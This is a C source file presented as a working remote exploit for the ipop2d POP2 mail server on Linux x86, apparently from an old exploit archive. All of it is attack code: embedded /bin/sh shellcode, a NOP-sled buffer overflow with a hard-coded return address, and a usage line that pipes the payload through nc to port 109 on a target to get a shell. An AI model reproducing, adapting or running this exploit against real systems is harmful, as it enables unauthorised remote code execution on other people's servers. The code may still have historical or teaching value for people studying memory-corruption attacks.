/*
* *working* ipop2d exploit for linux/x86
* tested on redhat 5.2
*
* - rsh <dmk@slack.net>
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
#define RET 0xbffff5a8
int
main (int argc, char *argv[])
{
char buf[1099];
int off = 0, b = 1024, i, a = 0;
u_long *p;
if (argc < 4)
{
fprintf (stderr, "use: (%s <auth> <user> <pw> [offset];cat) | nc"
" <target> 109\n", argv[0]);
exit (1);
}
if (argv[4])
off = atoi (argv[4]);
b -= strlen (argv[1]) + strlen (argv[2]) + 17;
fprintf (stderr, "{!} buf size\t: %d\n{!} ret addr\t: %#x\n\n", b,
RET - off);
memset (buf, 0x90, sizeof (buf));
for (i = ((b + 4) - strlen (shellcode)); i < (b + 4); i++)
buf[i] = shellcode[a++];
p = (u_long *) (buf + (b + 4));
*p = (RET - off);
buf[b + 4 + 4] = '\0';
printf ("HELO %s:%s %s\r\n", argv[1], argv[2], argv[3]);
sleep (10);
printf ("FOLD %s\r\n", buf);
}
syntax highlighted by Code2HTML, v. 0.9.1